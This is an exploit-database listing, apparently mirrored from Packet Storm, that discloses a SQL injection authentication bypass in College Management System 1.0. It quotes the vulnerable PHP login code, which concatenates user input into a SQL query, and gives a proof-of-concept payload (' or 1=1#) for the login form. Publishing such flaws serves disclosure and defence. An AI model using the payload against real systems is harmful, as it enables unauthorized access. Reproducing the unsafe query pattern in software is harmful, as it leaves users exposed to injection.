Lucene search
K

College Management System 1.0 SQL Injection

🗓️ 04 Oct 2021 00:00:00Reported by AbdulrahmanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 302 Views

College Management System 1.0 SQL Injection in logi

Code
`# Exploit Title: college management system - SQL Injection Authentication Bypass  
# Date: 01/10/2021  
# Exploit Author: Abdulrahman https://twitter.com/infosec_90  
# Vendor Homepage: https://www.eedunext.com/  
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/  
# Version: 1.0  
# Tested on: Kali Linux  
  
  
in login/login.php in line 8 :  
  
$username=$_POST["email"];  
$password=$_POST["password"];  
  
$query="select * from login where user_id='$username' and Password='$password' ";  
$result=mysqli_query($con,$query);  
  
  
POC :  
http://127.0.0.1/2/College-Management-System/login/login.php  
username : ' or 1=1#  
password : 123456  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Oct 2021 00:00Current
0.3Low risk
Vulners AI Score0.3
302